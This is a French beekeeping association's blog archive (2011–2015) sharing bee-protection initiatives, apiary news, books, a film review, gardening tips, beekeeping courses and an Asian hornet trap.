11
Mar
2015

My Positive Impact – Fondation HULOT

Aujourd’hui c’est le lancement de la Grande Campagne « My Positive Impact » par la Fondation Nicolas HULOT.
Découvrez les actes de femmes et d’hommes, qui déploient des solutions concrètes tournées vers le développement durable. Allez voter et donner de la visibilité à ses créatifs responsables.
Votez parmi les solutions proposées sur le site : www.mypositiveimpact.org

Un Toit Pour Les Abeilles ne figure pas hélas parmi la liste de ces acteurs concrets qui quotidiennement essaient, à leur échelle, de sensibiliser tout à chacun à l’importance de la préservation de la biodiversité. Mais nous continuons avec vous tous le combat, sans oublier ces autres acteurs qui agissent également pour un monde meilleur…
Allez voter nombreux et comme le dit Nicolas HULOT :

« Ensemble donnons le pouvoir aux solutions »

Présentation du Projet « My Positive Impact » par Nicolas HULOT

 

Source : www.mypositiveimpact.org

Ecrit par Un toit pour les abeilles dans : Autres initiatives,Evénements | Tags : , Commenter cet article
14
Jan
2015

Installation d’un nouveau Rucher à Périgny – 17 180 (Charente-Maritime)

Depuis le 1er octobre 2014, La Communauté d’Agglomération de La Rochelle a proposé à Un Toit Pour Les Abeilles, la mise à disposition d’un terrain d’environ 32 m²,  situé à proximité et en contrebas de la zone industrielle de Périgny, en Charente-Maritime, sur le site des Quatre chevaliers.

Ce terrain accueille depuis la fin d’année 2014 une dizaine de ruches de parrains « Entreprises locales ».

Un Toit Pour Les Abeilles remercie la CDA de La Rochelle pour le terrain mis à disposition, et avec lui sa collaboration au développement des colonies d’abeilles.

A découvrir, quelques photos de l’installation du rucher, avec Claude POIROT, Apiculteur Vendéen  et référent Un Toit Pour Les Abeilles, en charge du Rucher de Périgny et Régis LIPPINOIS, fondateur.

Les ruches sont ainsi, alignées sur le terrain encore vert en cette saison, mis à disposition par la CDA en contrebas de la quatre voies.

 

07
Jan
2015

Un Toit Pour Les Abeilles lance « Folies Royales »

Nombreux sont ceux qui souhaitent lutter contre le déclin des abeilles et de la biodiversité.

Parmi les actions et initiatives possibles :

  • Ne pas/plus utiliser de pesticides et autres herbicides
  • Vous pouvez planter des fleurs mellifères dans vos jardins, terrasses ou balcons
  • Installer un hôtel à insectes
  • Parrainer une ruche avec untoitpourlesabeilles.fr et recevoir en cadeau des pots de miel locaux et terroirs personnalisés
  • Privilégier l’achat de produits écoresponsables et engagés dans la sauvegarde des abeilles et de la biodiversité !

Un Toit Pour Les Abeilles a lancé en décembre dernier, une Gamme de Cosmétiques, engagée et responsable, à base de Miel, de Gelée Royale et de Cire d’Abeille BIO de nos apiculteurs !

En achetant un produit de la Gamme www.folies-royales.fr, vous faites un geste pour les abeilles et la biodiversité tout en prenant soin de vous.

Pour chaque produit acheté ce sont 5 petites abeilles parrainées  et 1 mètre de fleurs semées…

Alors rejoignez vite les défenseurs des abeilles et agissez avec nous pour sauvegarder l’espèce !

MERCI à vous tous, amoureux des abeilles pour votre soutien et votre engagement à nos côtés…

Et vive les abeilles !

Source : www.folies-royales.fr

 

03
Nov
2014

Art Book : Honey Bee (Une Action concrète pour la sauvegarde des abeilles)

Un Toit Pour Les Abeilles a souhaité mettre en lumière l’initiative originale d’une marraine, qui a voulu, à sa manière, participer à la sauvegarde des abeilles :

Elle a ainsi imaginé et concrétisé un recueil d’illustrations ayant pour thème les abeilles.

« Nous sommes vraiment ravis que notre prise de conscience ait touché Un Toit Pour Les Abeilles et que notre travail ait plu.
« Honey Bee » (c’est le nom du recueil), est né d’une idée il y a un peu plus d’un an, alors que je lisais un article sur la société Monsantos et les dégâts causés , entre autres, par leurs politiques de pesticides.

Je me suis alors demandé comment, en tant qu’artiste amateur, je pouvais, à mon échelle, protester contre leur façon d’agir, informer le plus de gens possibles sur la dégradation des écosystèmes et la disparition des abeilles en France et partout dans le monde. L’idée de l’artbook m’est alors venue grâce à d’autres artbook de charités disponibles un peu partout sur internet et pour diverses causes.

J’ai alors contacté tout les amis que j’avais dans le milieu de l’illustration jeunesse en leur demandant s’ils étaient intéressés par cette aventure. Tous, ou presque, ont répondu un grand « oui », car beaucoup d’entre eux ont à cœur la protection de l’environnement et nous essayons tous, à notre échelle, d’agir en ce sens.

J’ai donc réuni une trentaine de personnes en leur donnant pour thème  » les abeilles et la nature » et tous ont offert à l’artbook des illustrations touchantes, poétiques, engagés, chacun selon ses convictions et avec son style.

Le résultat est l’artbook fait avec le cœur par des artistes passionnés que vous tenez entre les mains.
Une fois le livre terminé, l’annonce au public a été la seconde étape. Comme nous fréquentons tous les conventions sur la culture japonaise ( japan expo entre autres) nous avons donc commencé à informer le public de la vente de cet artbook. Chaque artiste a donc mobilisé son propre public et le résultat a été une vente de la totalité des artbook. Les gens étaient très enthousiastes à l’idée de participer à la sauvegarde des abeilles en France tout en achetant un beau livre illustré.

J’ai vraiment été étonnée et touchée de voir les retours que j’ai eu sur l’artbook, beaucoup m’ont demandé des nouvelles des fonds collectés, etc.

Voilà, dans les grandes lignes, l’histoire d’Honey Bee,  Juste des artistes passionnés et une idée
Le chemin parcouru m’étonne encore… »

Voici le témoignage sincère d’Alix, qui a su transformer ses convictions en Acte concret pour l’environnement.

Nous avons le plaisir de vous partager ci-dessous quelques illustrations de l’Artbook « Honey Bee »…

 

Un Grand MERCI à Alix et aux illustrateurs qui ont participé à l’Art Book HONEY BEE…

Ecrit par Un toit pour les abeilles dans : Autres initiatives | Tags : , , , Commenter cet article
17
Juin
2014

La Caravane : Un nouveau Monde en Marche !

soutien caravane UNMEM

Durant 8 jours, une caravane des temps modernes a sillonné à vélo les routes de Paris à St Jean d’Angély. Son but, attirer l’attention sur la pertinence qu’un nouveau monde est en marche, un monde qui permet de créer des ponts entre producteurs, consommateurs et société civile, avec notamment le lancement d’une vallée bio « Val Bio Ouest ».
Cette caravane se compose de vélos, chacun porteur d’un projet symbolique d’« Un Nouveau Monde en Marche ».

Parmi les cyclistes qui l’ont fait, rallier Paris et Saint Jean d’Angély (soit 590km) :

Richard Vasseur aux couleurs d'Un toit pour les abeilles
Richard Vasseur aux couleurs d’Un toit pour les abeilles

Ils l’ont fait : rallier Paris à St Jean d’Angély à vélo. 590 kms en 8 jours, par un temps agréable et avec des rencontres magnifiques.

L’arrivée s’est faite vendredi après-midi lors du lancement de Val Bio Ouest, en présence de Ségolène Royal, ministre de l’écologie, Jean-François Macaire, président de la région Poitou-Charentes, Corinne Cap, Maryline Simoné, Benoit Biteau, conseillers régionaux, Françoise Mesnard, maire de St Jean d’Angély, Béatrice Abovillier, Préfète et Suzanne Tallard, Députée de la circonscription de Rochefort.

Fatigués mais heureux, ils ont gravi la dernière côte qui mène au silo Val Bio Ouest et ont fait un tour d’honneur dans la salle de conférence, invités par Edouard Rousseau. Les personnes présentes ont applaudi chaleureusement cette caravane des temps modernes et ses participants.

arrivée de la caravane

Laurent Muratet (Un nouveau monde en marche) et Pierre-Emmanuel Drouart (Un arbre sur mon chemin) ont repris la parole en fin de journée afin d’expliquer à tous leurs démarches personnelles et professionnelles, leurs engagements en faveur d’une société non violente, écologique et solidaire.

 regroupement un nouveau monde en marche Laurent et Pierre-Emmanuel Edouard et Laurent Arrivée de Ségolène Royal
Bravo à tous les cyclistes, d’un jour ou de tous les jours : Laurent, Carl, Pierre-Emmanuel, Fabien, Laurent, Jérôme, Richard, Didier, François, Matthieu, Vincent, Marc, Manu, Issa Elle, Armand… et tous ceux qui ont participé de près ou de loin.

PS : une dizaine d’arbres fruitiers sera plantée sur le site à l’automne… grâce aux dons effectués en ligne. Vous pouvez encore participer !

Source : www.unarbresurmonchemin.com/un-nouveau-monde-en-marche

 

 

Ecrit par Un toit pour les abeilles dans : Autres initiatives | Tags : Commenter cet article
22
Mai
2014

« Au royaume des abeilles » Livre

Les abeilles vont envahir les écoles

Les abeilles vont envahir les écolesGérard Freyssenge veut faire partager sa passion aux enfants des écoles 
« Au royaume des abeilles » est un livre jeunesse qui fait le buzz ! Publié aux éditions Empreinte, cet ouvrage à la fois ludique, pédagogique et écologique a été écrit par Gérard Freyssenge, auteur toulousain et également apiculteur. Il interviendra le vendredi 23 à Arès, en milieu scolaire, pour faire découvrir la vie des abeilles aux enfants et sera en dédicace au centre Leclerc le lendemain samedi 24 mai. Il répond à quelques questions :

« Sud Ouest ». Comment est née cette passion pour les abeilles ?Gérard Freyssenge. Le monde des abeilles m’a toujours attiré mais il y a quelques années, un film sur la vie des abeilles m’a profondément touché. J’ai voulu en savoir davantage et peu de temps après j’ai suivi une formation d’apiculture. C’était le début d’une belle passion que, en écrivant ce livre, j’ai voulu partager avec petits et grands.

C’est un livre écologiste ?Ce livre sans être pessimiste, lance un cri d’alarme à l’homme qui, souvent sans en avoir conscience, peut anéantir des milliers d’abeilles, mais aussi des plantes, et tout simplement l’humanité !

J’ai voulu faire un livre ludique mais sérieux qui permette de comprendre facilement la vie des abeilles et qui sorte du schéma traditionnel des livres d’enfants que je trouve souvent trop romancés. Soyons clairs : ce n’est pas « Maya l’abeille » ! Pour ma part depuis que je connais mieux les abeilles, je ne vois plus du tout les fleurs et la nature de la même façon.

Ce livre a sa place à l’école ?Ce sont les enseignants qui le disent après avoir lu « Au royaume des abeilles ». Ils me sollicitent pour que je vienne dans leurs classes, comme par exemple à Arès ce vendredi, y présenter la vie des abeilles en gardant le livre comme fil conducteur.

Je rends visite aux enfants avec une ruche pédagogique, une vidéo-projection, des posters imagés et je termine mes rencontres par une distribution de petits pots de miel. J’essaie le plus simplement possible de faire connaitre aux enfants le monde passionnant des abeilles tout en les sensibilisant à la fragilité de notre environnement. En espérant qu’après ils crieront : « Vive les abeilles, à bas les pesticides »

Source : www.sudouest.fr/les-abeilles-vont-envahir-les-ecoles

Ecrit par Un toit pour les abeilles dans : Autres initiatives | Tags : Commenter cet article
20
Mai
2014

Festival de Cannes 2014, «Les Merveilles»

 

«Les Merveilles», une ruche cinématographique d’Alice Rohrwacher  par Siegfried Forster

 

media«Le Meraviglie» (Les Merveilles) d’Alice Rohrwacher.ANSA
Un conte moderne sur le vivre autrement. Dans Les Merveilles, une famille d’apiculteurs en Ombrie habite et travaille dans une ferme délabrée à l’écart de la ville et de toute modernité. Un jour, un jeu télévisé débarque dans la région et met à rude épreuve leur façon d’être.

Une abeille se balade sur la bouche d’une fille, fière de son exploit. Gelsomina est le chouchou de son père, l’Allemand Wolfgang qui s’est reconverti à l’apiculture pour vivre avec sa femme italienne et ses quatre filles une vie en liberté et loin de la modernité jugée « décadente ».

Le prix de cette liberté est une organisation contraignante pour prendre soin des ruches, retrouver les abeilles qui s’échappent régulièrement et accepter le fardeau de la fabrication du miel en mode artisanal. Chaque enfant a un rôle à jouer dans cette répartition du travail. Et oublier de changer le seau sous la centrifuge qui libère le miel équivaut à une punition sévère de la part d’un père psychorigide. Tant bien que mal, cet ancien révolutionnaire essaie de tenir à distance les menaces diverses et variées qui planent sur leur petit paradis. Il y a le manque d’argent, les chasseurs qui tirent sur tout ce qui bouge, mais aussi l’administration qui les oblige à respecter les très coûteuses mesures d’hygiène dans leur atelier de fabrication de miel.

Et puis, de plus en plus, les désirs des filles grandissantes se manifestent, échappant au contrôle parental. Elles n’adhèrent pas à l’utopie laborieuse de l’autarcie et de vie en communauté de leurs parents. Elles n’ont plus rien à faire avec le chameau acheté par le père, un cadeau venu trop tard pour réaliser leur rêve d’enfance devenu désuet. Les jeunes ont envie d’entrer dans la modernité et de participer à un jeu de téléréalité nomméVillage des merveilles, situé sur une île près de leur maison. Il suffit de prendre les apparences d’une famille étrusque authentique pour pouvoir espérer d’obtenir des gains faciles. Un jeu de rôle aussi absurde que lucratif. Pour le père, un signe infaillible que la fin du monde (de leur monde) est proche, même s’il reste tout ébahi devant la beauté de la fée du jeu télévisé, incarnée par Monica Bellucci.

La réalisatrice Alice Rohrwacher est issue d’une famille italo-allemande, mais affirme que rien dans le récit ne serait autobiographique. Ce qui n’empêche pas que sa sœur joue brillamment cette mère qui oscille entre les univers et souffre de cet écart entre l’idéal et la réalité, entre les différentes cultures dans sa propre famille. Après des mois de préparation pour apprendre aux acteurs les gestes pour manipuler de véritables ruches et de vrais essaims, Rohrwacher a réussi à faire naître cette utopie d’une vie alternative sans encombrer l’horizon. Une petite histoire qui mène à l’échec, mais enrichit notre l’imaginaire.

Source : www.rfi.fr/les-merveilles-ruche-cinematographique

 

Ecrit par Un toit pour les abeilles dans : Autres initiatives | Tags : Commenter cet article
01
Mai
2014

Le choix des jardins désordonnés

Certaines abeilles solitaires vivent dans de petites cavités creusées dans le sol, dans de la terre légère. Mais d’autres recherchent des cavités hors-sol, qui peuvent se faire rares dans certains jardins et parcs où les «déchets» végétaux sont évacués, comme des tiges et troncs morts.

Pour aider les centaines d’espèces solitairesà s’installer et à faire leur nid dans votre jardin, verger, potager ou vos champs, des petits nichoirs appropriés peuvent être dispersés.

Pas d’hôtel, mais un «studio privé»

Les hôtels à insectes sont à la mode ces dernières années. Mais ces jolies structures vendues dans le commerce ou bricolées ne sont pas idéales pour les abeilles. «C’est décoratif et pédagogique, mais l’ennui est qu’un hôtel met en concurrence les différentes abeilles qui y cohabitent, prévient Jean-Sébastien Rousseau-Piot, du service éducation et sensibilisation de Natagora. On conseille plutôt d’éparpiller de petites structures différentes aux quatre coins du jardin.»

À chacune son entrée

Les abris doivent varier en matériaux et présenter des trous de tailles différentes, pour accueillir toutes les tailles d’abeilles, d’œufs et de larves: de 2 mm à 10 mm (lire ci-contre). Les orifices du refuge doivent être protégés des intempérieset orientés entre le sud et l’est de façonà recevoir les rayons du soleil le plus longtemps possible. Ouvrir un abri à insectes est utile à tout moment. Avant l’hiver, il pourra accueillir certains insectes cherchant à se protéger du froid. Au début du printemps, il permet d’accueillir les pontes et larves. En toute logique, le refuge à insectes s’intègre dans un jardin respectant la biodiversité et aménagé de haies, d’arbustes indigènes et variés, bordé d’un pré fleuri et non traité par des produits chimiques! Il est tout à fait possible également d’installer un refuge sur un balcon d’appartement.

Source : http://www.lavenir.net/article/jardins-désordonnés

 

Ecrit par Un toit pour les abeilles dans : Autres initiatives | Tags : Commenter cet article
23
Avr
2014

Au jardin ce week-end : semez des fleurs pour les abeilles


Butineuses et butineurs ont besoin de disposer en permanence d’un solide garde-manger ! Plantez pour cela des mélanges de fleurs des champs «spécial pollinisateurs» ou bien laissez pousser quelques herbes sauvages.

Il suffit juste de tendre un peu l’oreille. Dans la glycine en fleurs, telle un océan aux vagues mauve clair, un vrombissement continu perturbe le silence de la campagne endormie sous ce chaud soleil d’avril. Des centaines d’abeilles mais aussi de bourdons sauvages butinent inlassablement les fleurs de cette belle grimpante au faîte de sa splendeur. Il y a les fameuses abeilles charpentières, ou bourdons bleus (Xylocopa violacea), impressionnantes de par leur taille mais absolument inoffensives, qui nichent dans du bois mort, mais aussi, comme leur nom l’indique, dans les charpentes des maisons. Plus classique, le bourdon terrestre (Bombus terrestris), reconnaissable au bout de son abdomen blanc surmonté de deux raies, noire et jaune d’or, creuse son nid dans la terre tout comme le bourdon des champs (Bombus pascuorum), qui vit en colonies d’une centaine d’individus. Sans parler des anthophores, osmies, mégachiles et anthidies, toutes sauvages et solitaires, mais aussi d’apis mellifera, l’abeille domestique. En récoltant pollen et nectar pour nourrir leurs larves, ces infatigables hyménoptères contribuent à féconder les fleurs d’un grand nombre de plantes.

L'abeille charpentière.
 

L’image est rassurante, réjouissante même, mais ne doit pas faire illusion. Car sur les 865 espèces d’abeilles et de bourdons sauvages recensées en France, un grand nombre sont menacées de disparition. Insecticides utilisés sans discernement mais aussi parasites, destruction des habitats, baisse de la biodiversité végétale liée à l’expansion des monocultures rendent ces précieux auxiliaires du jardinier particulièrement vulnérables.Peut-être avez-vous déjà installé un «hôtel à insectes»dans lequel cette minuscule gente ailée à six pattes va pouvoir nicher en toute sécurité et reconstituer ses rangs par trop clairsemés.

Pour compléter la panoplie, installez des bandes fleuries même de quelques mètres carrés, dans votre jardin et sur votre pelouse, car la glycine, mais aussi les pommiers ou l’arbre de Judée, ne resteront pas éternellement en fleurs. Or abeilles et bourdons, que la disette menace à certaines périodes de l’année, ont besoin de disposer en permanence d’un solide garde-manger! Semez pour cela, en situation bien exposée, des mélanges de fleurs des champs «spécial pollinisateurs» disponibles dans toutes les bonnes jardineries ou bien laissez pousser quelques herbes sauvages dont butineuses et butineurs raffolent: mélilot blanc, trèfle violet, lotier corniculé, mauve, centaurée, lamier, etc. Vous aurez également la surprise d’y admirer quantité de papillons, friands, eux aussi, de nectar sucré.

● Au potager

Fleur de courgette.
 

Semez les cucurbitacées sous abri. Sauf dans les régions du Midi où il est possible de les installer dès à présent en pleine terre, vous pouvez gagner du temps en semant courgettes, concombres, pastèques, courges et potirons dans des godets en plastique ou en tourbe (7 à 8 cm de diamètre) que vous placerez dans votre châssis, votre serre, votre véranda ou sous un tunnel plastique. Remplissez les récipients au trois quarts avec du terreau «spécial semis», déposez trois ou quatre graines, recouvrez avec du terreau puis arrosez délicatement en pluie. Veillez à ce que vos semis soient bien exposés à la lumière (placez-les près d’une fenêtre le cas échéant) et ne manquent jamais d’eau. Dans trois semaines à un mois, les jeunes plants seront prêts à être installés à leur emplacement définitif dans votre jardin.

Repiquez les semis de tomates. Dès qu’elles ont atteint le stade quatre feuilles, les jeunes tomates que vous avez semées en terrine il y a quelques semaines doivent être repiquées dans des godets individuels de taille comparable à ceux utilisés pour les cucurbitacées (voir plus haut).Sélectionnez les plus belles plantules puis déterrez-les soigneusement à l’aide de la lame d’un couteau rond en évitant au maximum de mettre les racines à nu. Replantez-les ensuite chacune séparément au centre d’un godet que vous remplirez de terreau spécial semis. Arrosez jusqu’à saturation, puis emmagasinez vos plants sous abri à côté des semis de cucurbitacées. Vous mettrez tout ce petit monde en pleine terre après les saints de glace (11, 12 et 13 mai).

● Dans vos massifs

Des jonquilles.
 

Tressez narcisses et jonquilles. Ce n’est pas parce que ces belles liliacées ont cessé de fleurir qu’il faut les couper à ras! Pour donner naissance à de nouveaux bulbes qui leur permettront de refleurir au prochain printemps, narcisses et jonquilles ont besoin de toutes leurs feuilles. Ces capteurs solaires on ne peut plus naturels fabriquent en effet, par le truchement de la photosynthèse, les sucres dont vos narcisses ont besoin pour reprendre des forces et assurer leur descendance. En même temps ces touffes vertes, un peu défraîchies, prennent de la place et ne sont pas du plus bel effet dans vos massifs de fleurs. Pour joindre l’utile à l’agréable, Muriel de Curel, propriétaire du domaine de Beauregard (Essonne), propose ni plus ni moins de tresser les feuilles de vos narcisses et jonquilles: ces derniers pourront ainsi continuer à «photosynthétiser» tout leur saoul sans nuire à la beauté de vos parterres!

Source : www.lefigaro.fr/au-jardin-ce-week-end-semez-des-fleurs-pour-les-abeilles.

Ecrit par Un toit pour les abeilles dans : Autres initiatives | Tags : Commenter cet article
07
Avr
2014

Miel, l’art des abeilles, l’or de la ruche

Miel, l'art des abeilles, l'or de la ruche

Trésor de la nature, symbole de douceur, de prospérité et d’abondance, le miel est une merveille. Mais savez vous comment travaillent les abeilles pour produire ce délicieux nectar ? C’est ce que vous proposent de découvrir les éditions de l’Homme avec l’ouvrage Miel, l’art des abeilles, l’or de la ruche.

Vous y découvrirez tout ce que vous devez connaître des abeilles et de leur organisation qui aboutit à la production du miel. Vous serez sans doute surpris de découvrir l’extraordinaire variété de plantes et de fleurs butinées qui donnent des miels aux couleurs, aux textures et aux saveurs si différentes. Et le miel n’est pas le seul trésor de la ruche. Propolis, cire, gelée royale, pollen sont autant de sources de bienfaits pour notre santé.

L’ouvrage vous propose également de découvrir les joies de la cuisine au miel à travers une cinquantaine de recettes délicieuses et n’imaginez pas qu’il ne s’agit que de desserts ! Vous retrouverez le miel dans des boissons, des entrées, des plats et des desserts évidemment. Vous y apprendrez également les merveilleux accords entre miel et fromages.

Un ouvrage à se procurer de toute urgence pour comprendre pourquoi il est si important de protéger les abeilles et les trésor qu’elles produisent au quotidien. En cette semaine du développement durable, apportez votre pierre à l’édifice en consommant bio ou en jardinant sans utiliser de pesticides.

par Nicolas Depardieu, Jeudi 3 avril 2014

Source : www.zegreenweb.com/miel-l’art-des-abeilles-l’or-de-la-ruche

Ecrit par Un toit pour les abeilles dans : Autres initiatives | Tags : , , Commenter cet article
04
Mar
2014

Food Art : Des sculptures en cire d’abeille

 

Aganetha Dyck réalise des sculptures avec l’aide des abeilles en les laissant déposer leur cire sur des objets et des figurines endommagés. La rédaction de meltyFood vous décrypte ces œuvres de food-art.

miel

Le food-art nous réserve toujours d’originales surprises ! Alors que certains remplacent des blessures faciales par des bonbons, d’autres font appel à l’aide des abeilles pour laisser libre cours à leur créativité. C’est le cas de l’artiste canadienne Aganetha Dyck, disposant des objets dans les ruches “pour que les abeilles se les approprient”. En bref, les abeilles apportent leur contribution à l’oeuvre d’art en déposant leur cire sur les figurines endommagées. Le résultat ? Des sculptures époustouflantes habitées par la cire d’abeille.“Je choisis des objets endommagés, car les abeilles sont des êtres méticuleux, elles réparent en permanence tout autour d’elles et font attention aux détails”confie Aganetha Dyck. La rédaction de meltyFood est épatée par le potentiel de ces insectes à miel !

Aganetha Dyck
Aganetha Dyck

Food Art : Aganetha Dyck

Aganetha Dyck

Aganetha Dyck

 

Ecrit par Un toit pour les abeilles dans : Autres initiatives | Tags : Commenter cet article
29
Jan
2014

confitures à base de miel

Les apiculteurs  s’occupent de votre ligne dès le petit déjeuner !

Pour profiter pleinement de la confiture sans culpabiliser sur la quantité de sucre, Pascale ( voir le portrait) se propose de vous confier les secrets de sa recette de confiture à base de miel (confimiel).

Tout les samedi, elle organise des ateliers de fabrication de confimiel à la Miellerie des Fontenelles à Triaize, en Vendée. Vous  repartirez avec vos pots de confimiels (différents fruits) étiquetés à votre nom, après une dégustation de votre production.

 

Lieu (voir un plan) : Miellerie des Fontenelle , Les Fontenelles , 85580 TRIAIZE

Réservation : par téléphone en contactant Pascale au 06 83 23 23 91

Dates : .Tous les samedis matin (réservation obligatoire).

Prix : 45 €

 

29
Jan
2014

Rencontre avec Sarah

Sarah HOLTZMANN notre apicultrice des Vosges sera au salon de l’agriculture 2014, Hall de la Région Lorraine les Mardi 25 Février et Dimanche 2 Mars.

Venez la rencontrer !

Ecrit par Un toit pour les abeilles dans : Autres initiatives | Commenter cet article
29
Jan
2014

Stages d’apiculture pour la saison 2014

Chantal Jacquot et Yves Robert, apiculteurs en Bourgogne  vous proposent des stages d’apiculture pour la saison 2014.
L’exploitation  est orientée vers le mode de production biologique du miel en vue d’obtenir la certification.
Les ruches sont de type Warré.

Initiation à l’apiculture Bio :
« Les abeilles sont fascinantes et très attachantes »
Installer une ruche permet d’améliorer la pollinisation, de récolter du bon miel et d’agir concrètement en faveur de l’écologie.
24-25 mai 2014 week-end Initiation à l’apiculture Bio
21-22 juin 2014 week-end Initiation à l’apiculture Bio
5-6 juillet 2014 week-end Initiation à l’apiculture Bio
Thèmes abordés : connaissance de la colonie d’abeilles et de son fonctionnement, les principes de base de l’apiculture bio, caractéristiques de la ruche warré, principales interventions au rucher. Mise en pratique : découverte des abeilles, observations et ouverture d’une ruche, découverte de la flore mellifère.

Stage d’apiculture: conduite de ruches Warré (perfectionnement) :

Ce stage d’apiculture se déroule en quatre demi-journées (les samedis après-midi de 13h45 à 17h15)
1er mars 2014: Notion d’écologie et d’apiculture Bio
 5 avril 2014: Visite de printemps
19 avril 2014: Essaimage et méthode de multiplication 
26 juillet 2014: Préparation à l’hivernage

 

+ d’infos et tarifs sur leur site http://www.culturenature71.com/
Ecrit par Un toit pour les abeilles dans : Autres initiatives | Commenter cet article
11
Déc
2013

L’apiculture, une passion

Nous avons le plaisir de partager les photos de ces ruches montées par des passionnés d’apiculture.

Elles ont été peintes par Denise. Nos félicitations pour ce beau travail !

 

 

 

09
Juin
2013

Des abeilles aux écrevisses

Trop de pluie ce samedi pour emmener les enfants voir les abeilles…

Pour occuper tout ce petit monde, nous avons proposé une pêche à l’écrevisse. Les enfants ont pêché 340 écrevisses (si si on les a compté) dans l’après-midi. Nous nous sommes empressés de les préparer le soir même pour les déguster lors d’un repas collectif.

 

Ecrit par Régis dans : Autres initiatives | Tags : Commenter cet article
08
Juin
2013

Les petites vendeuses de fleurs

Ce samedi vente de fleurs sur le marché de Fouras.

Le matin ramassage des fleurs et confection des bouquets. Dès 11h, les enfant étaient sur le marché pour vendre les bouquets et gagner 16 € au total !

Ecrit par Régis dans : Autres initiatives | Tags : , Commenter cet article
19
Avr
2013

Ruches tressées

Ruche tressée

Voici un lien vers le site de Patrice qui réalise de magnifique ruches tressée.

http://naturanim.free.fr/spip.php?article35

Patrice est un  animateur nature, récoltant négociant en plantes et champignons sauvages. Je ne résiste pas au plaisir de vous renvoyer vers une page d’allumage de feu par friction :

http://naturanim.free.fr/spip.php?rubrique7

Expérience que nous avions nous même tenté il y a quelques années : https://www.untoitpourlesabeilles.fr/blog/allumer-le-feu/

 

 

27
Fév
2013

Stage de Jardinage

Le vendredi 8 Mars

Au programme :
S’engager sur une charte de conduite écologique d’un jardin ou parc.
Identifier les savoir-faire nécessaires à une pratique agroécologique.
Élaborer concrètement le plan et les étapes de son propre projet jardin.

Formateur : Yves Robert, formateur en agroécologie

Lieu : canton de Sennecey-le-Grand:
Aspects théoriques: en salle
Aspects pratiques: dans le jardin expérimental et pédagogique conduit selon la charte écologique des Jardins de Noé.

Mode de participation:
Réservation: 06.87.14.90.66
90 € la journée – 140 € pour un couple

Yves Robert développe ce programme de formation au sein de la Coopérative d’activité L’Envol
Siret: 4802111920020
Agrément formation: 26210228121

Site Web ou carte : http://www.culturenature71.com

Ecrit par Un toit pour les abeilles dans : Autres initiatives | Tags : Commenter cet article
18
Jan
2013

Ruche paille

Nous ne résistons pas au plaisir de vous montrer les photos des ruches en paille réalisée pas Denise.

dès le printemps, Denise ira récolté un essaim qu’elle installera dans l’une des ruches. Elle nous communiquera les nouvelles photos avec l’évolution de l’essaim. Pour contacter Denise : denise.rousselet21@gmail.com

Voir des articles se rapprochant de ce sujet

 

Ecrit par Régis dans : Autres initiatives | Tags : Commenter cet article
22
Mai
2012

Les contes de la Goutte de Miel

Edité aux Editions Les2Encres, découvrez un recueil de contes racontés en public et retranscrits par écrit.

Il parait  que le miel est douceur et gourmandise ! Les histoires le sont aussi.

Depuis la nuit des temps le miel dispense aux hommes la joie et le bonheur ! Les histoires aussi.

Les butineuses  rentrant à la ruche  avec le corps couvert de pollen,  ont entendu et vu des histoires – les histoires des hommes,  les histoires du vent,  de l’eau, du sable.

Les contes sont venus  les contes vous arrivent  les contes continuent leur chemin !

Être conteuse c’est être passeuse !

Les contes de ce recueil vivent dans l’oralité et dans la mémoire des Hommes.
Ils continuent leur vie en entrant par vos oreilles  dans votre imaginaire et ressortent par votre bouche pour entrer dans d’autres oreilles
Loin de toutes rationalités, ils vous autorisent à rêver,  à imaginer.
Vous devenez le héros,  l’héroïne d’histoires venues  il y a bien longtemps  de l’ancienne Russie,  de l’Estonie,  de Slovénie,  de Pologne,  de Tchécoslovaquie,  de Roumanie,  d’Arménie,  de Hongrie,  d’Albanie,  de Tasjistan …

 Krystin Vesterälen est conteuse, lectrice, directrice artistique d’une association de conteurs traditionnels et de lecteurs publics, la Compagnie du Pausilippe.
Pour elle, l’art du Conte est porteur d’imaginaires, venant de toutes les cultures, de toutes les époques… Dans ce monde de plus en plus rationnel, écouter une histoire, c’est s’autoriser à ouvrir son horizon à d’autres mondes, d’autres cultures, d’autres formes de langage. Raconter une histoire, c’est entrer en relation avec autrui.

Broché: 150 pages

Editeur : LES 2 ENCRES (1 janvier 2012)

Langue : Français

https://www.facebook.com/groups/101864506589120/

 

 

 

 

 

 

 

 

 

Ecrit par Un toit pour les abeilles dans : Autres initiatives | Commenter cet article
19
Oct
2011

Piège à frelons asiatiques

Le frelon asiatique, comme son nom l’indique, est venu de Chine transporté dans des poteries.

Il prolifère très rapidement et s’est bien acclimaté à la France.
D’abord, il a envahi l’ouest  et, à ce jour, on en trouve presque partout voire dans des zones d’altitude.

Les frelons asiatiques font des vols stationnaires devant les ruches attendant que les abeilles ouvrières en sortent pour les attraper, les découper et en nourrir les larves.

Une dizaine de frelons suffisent à décimer une colonie d’abeilles ou à moindre mesure la stresser.

A ce jour, les moyens pour lutter contre ce prédateur sont artisanaux et ne permettent pas d’éradiquer cette espèce.

Ils souvent réalisés avec des bouteilles plastiques remplies d’un mélange à base de bière et sirop favorisant la capture de spécimens.
Une opération malheureusement dérisoire  vu la vitesse de reproduction de ce frelon.
A cela, on ajoute le risque de capture d’autres insectes attirés par le mélange.
Les apiculteurs utilisent également des grilles à l’entrée des ruches empêchant le frelon d’y pénétrer (comme c’est le cas en Asie) bien que le Vespa velutina continue d’attraper les abeilles en vol.

Aucune mesure nationale n’a pour le moment été prise pour endiguer ce fléau ce qui implique qu’à ce jour, la destruction des nids soient à la charge des propriétaires des terrains sur lesquels ils se trouvent (de 70 à 400 euros).
A l’échelle locale, certaines collectivités (conseils généraux, mairies…) remboursent la destruction des nids effectués par les professionnels (remboursement de l’ordre de 70 €).

A ce sujet, nous souhaitions vous présenter l’invention de Raoul Gauffre qui nous semble digne d’intérêt.

Voici le reportage de quelques minutes diffusé  sur TF1 et qui présente la réalisation de son piège à frelons.

Un Vespa velutina

Reportage JT TF1

A cela, vous pouvez consulter le schéma de construction

Piege a frelons asiatiques (Vespa velutina)
Schéma extrait de Abeilles et Fleurs parution Octobre 2011 (édité par l’UNAF)


Ecrit par Un toit pour les abeilles dans : Autres initiatives | Tags : , , Commenter cet article
25
Juil
2011

Nos initiatives

Cultures mellifères

Vous avez été nombreux à participer au financement de cultures mellifères et nous vous en remercions.

Le parrainage d’abeilles comme action de protection  des abeilles est indissociable de la préservation de son environnement.
Malgré sa grande capacité d’adaptation, l’abeille a besoin d’une alimentation variée et naturelle pour bien se porter.
L’implantation de cultures mellifères est ainsi un apport très intéressant pour les insectes pollinisateurs et les abeilles.
